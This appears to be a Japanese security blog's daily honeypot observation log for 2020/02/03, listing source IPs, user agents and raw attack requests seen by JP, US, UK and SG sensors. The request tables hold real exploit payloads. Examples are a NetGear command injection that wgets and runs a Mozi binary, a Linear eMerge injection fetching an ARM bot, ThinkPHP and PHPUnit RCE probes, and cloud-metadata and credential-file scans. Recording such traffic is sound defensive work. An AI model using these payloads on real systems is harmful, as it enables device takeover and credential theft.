コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2020/02/03 ハニーポット(仮) 観測記録

honeypot

ハニーポット(仮) 観測記録 2020/02/03分です。

特徴
Location:JP

Shenzhen TVT製品の脆弱性を狙うアクセス
クラウド環境のメタデータ情報を狙うアクセス
AWS Security Scannerによるスキャン行為
/.aws/credentialsへのスキャン行為
18[.]179[.]20[.]5に関する不正通信
を確認しました。

Location:US

Shenzhen TVT製品の脆弱性を狙うアクセス
/.envへのスキャン行為
/.git/configへのスキャン行為
を確認しました。

Location:UK

NetGear製品の脆弱性を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
Shenzhen TVT製品の脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
/.aws/credentialsへのスキャン行為
Apache Solrへのスキャン行為
を確認しました。

Location:SG

Linear eMerge E3製品の脆弱性を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
Shenzhen TVT製品の脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Apache Solrへのスキャン行為
123[.]125[.]114[.]144に関する不正通信
を確認しました。

アクセス数推移

JP:総アクセス数:56 (前日比:-50)
US:総アクセス数:18 (前日比:-14)
UK:総アクセス数:23 (前日比:-3)
SG:総アクセス数:27 (前日比:+6)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
1 120.132.3.65 China
1 120.41.186.122 China
1 13.53.167.81 Sweden
1 13.53.175.104 Sweden
1 147.158.48.11 Malaysia
8 154.113.16.226 Nigeria
1 175.144.244.192 Malaysia
1 185.156.177.50 Russia
1 189.154.108.123 Mexico
1 220.130.38.76 Taiwan
1 27.78.90.69 Vietnam
1 34.241.173.245 Ireland
34 44.224.22.196 United States
1 46.166.187.111 Netherlands
2 49.233.66.116 China

UserAgent一覧

件数 UserAgent
26 -
1 ApiTool
14 AWS Security Scanner
3 curl/7.47.0
11 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36

リクエスト内容一覧

件数 Method Request Protocol
5 -
10 CONNECT 18[.]179[.]20[.]5:80 HTTP/1.0
3 GET /.aws/credentials HTTP/1.1
1 GET /elrekt.php HTTP/1.1
1 GET /html/public/index.php HTTP/1.1
2 GET http://169[.]254[.]169[.]254/ HTTP/1.1
2 GET http://169[.]254[.]169[.]254/latest/dynamic/instance-identity/document HTTP/1.1
2 GET http://example[.]com/ HTTP/1.1
2 GET http://[::ffff:a9fe:a9fe]/ HTTP/1.1
2 GET http://[::ffff:a9fe:a9fe]/latest/dynamic/instance-identity/document HTTP/1.1
1 GET http://www[.]qq[.]com/404/search_children.js HTTP/1.1
1 GET /index.php HTTP/1.1
4 GET /latest/dynamic/instance-identity/document HTTP/1.1
1 GET /public/index.php HTTP/1.1
1 GET /thinkphp/html/public/index.php HTTP/1.1
1 GET /TP/html/public/index.php HTTP/1.1
2 GET /TP/index.php HTTP/1.1
3 GET /TP/public/index.php HTTP/1.1
1 POST /editBlackAndWhiteList HTTP/1.1
1 \x03
10 \x16\x03\x01
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
1 172.104.242.173 United States
1 183.129.159.243 China
1 187.110.252.119 Brazil
1 187.234.79.244 Mexico
1 222.186.19.221 China
1 45.136.108.64 Germany
1 46.166.187.111 Netherlands
3 51.158.118.213 France
1 60.191.20.213 China
1 79.10.158.118 Italy
4 89.248.174.146 Netherlands
1 94.60.15.3 Portugal
1 99.1.237.68 United States

UserAgent一覧

件数 UserAgent
9 -
3 ApiTool
4 Go-http-client/1.1
2 Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko

リクエスト内容一覧

件数 Method Request Protocol
5 -
1 CONNECT ip[.]ws[.]126[.]net:443 HTTP/1.1
2 CONNECT www[.]baidu[.]com:443 HTTP/1.0
1 GET /.env HTTP/1.1
1 GET /.git/config HTTP/1.1
1 GET ../../ HTTP
2 GET ../../proc/ HTTP
1 GET /v2/_catalog HTTP/1.1
3 POST /editBlackAndWhiteList HTTP/1.1
1 \x03
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
1 1.0.244.148 Thailand
1 106.124.178.81 China
1 13.48.85.19 Sweden
1 172.104.242.173 United States
1 18.184.218.237 United States
1 185.156.177.50 Russia
1 189.139.59.37 Mexico
1 193.57.40.38 Ukraine
1 217.13.219.254 Russia
1 222.186.19.221 China
1 46.166.187.111 Netherlands
5 5.101.0.209 Russia
2 63.143.35.226 United States
1 63.35.179.39 Ireland
1 79.112.160.108 Romania
2 89.248.174.146 Netherlands
1 93.170.48.5 Ukraine

UserAgent一覧

件数 UserAgent
11 -
2 ApiTool
3 curl/7.47.0
1 Go-http-client/1.1
6 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36

リクエスト内容一覧

件数 Method Request Protocol
6 -
1 CONNECT ip[.]ws[.]126[.]net:443 HTTP/1.1
2 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
3 GET /.aws/credentials HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP HTTP/1.1
1 GET ../../proc/ HTTP
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://106[.]124[.]178[.]81:48505/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 HEAD /robots.txt HTTP/1.0
2 POST /editBlackAndWhiteList HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 \x03
Location:SG

送信元IPアドレス一覧

件数 送信元IPアドレス
1 104.40.242.46 United States
1 106.59.245.133 China
1 110.177.82.71 China
1 110.177.86.216 China
1 110.80.153.220 China
1 117.15.94.25 China
1 119.237.200.226 Hong Kong
1 1.202.112.123 China
1 123.160.234.46 China
1 171.34.178.171 China
1 171.34.178.32 China
1 172.104.242.173 United States
1 177.191.161.234 Brazil
1 185.156.177.50 Russia
1 222.186.19.221 China
1 36.32.3.135 China
1 46.166.187.111 Netherlands
5 5.101.0.209 Russia
1 58.249.98.176 China
1 87.11.218.80 Italy
1 88.61.0.93 Italy
2 89.248.174.146 Netherlands

UserAgent一覧

件数 UserAgent
7 -
2 ApiTool
1 Go-http-client/1.1
1 Mozilla/5.0
1 Mozilla/5.01719037 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36
5 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
6 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
4 PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3

リクエスト内容一覧

件数 Method Request Protocol
4 -
1 CONNECT cn[.]bing[.]com:443 HTTP/1.1
1 CONNECT ip[.]ws[.]126[.]net:443 HTTP/1.1
1 CONNECT www[.]baidu[.]com:443 HTTP/1.1
1 CONNECT www[.]ipip[.]net:443 HTTP/1.1
1 CONNECT www[.]voanews[.]com:443 HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /card_scan_decoder.php?No=30&door=%60wget http://switchnets[.]net/hoho.arm7;
1 GET http://boxun[.]com/ HTTP/1.1
1 GET http://www[.]123cha[.]com/ HTTP/1.1
1 GET http://www[.]epochtimes[.]com/ HTTP/1.1
1 GET http://www[.]minghui[.]org/ HTTP/1.1
1 GET http://www[.]rfa[.]org/english/ HTTP/1.1
1 GET http://www[.]wujieliulan[.]com/ HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP HTTP/1.1
1 GET ../../proc/ HTTP
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /webdav/ HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 HEAD http://123[.]125[.]114[.]144/ HTTP/1.1
2 POST /editBlackAndWhiteList HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 \x03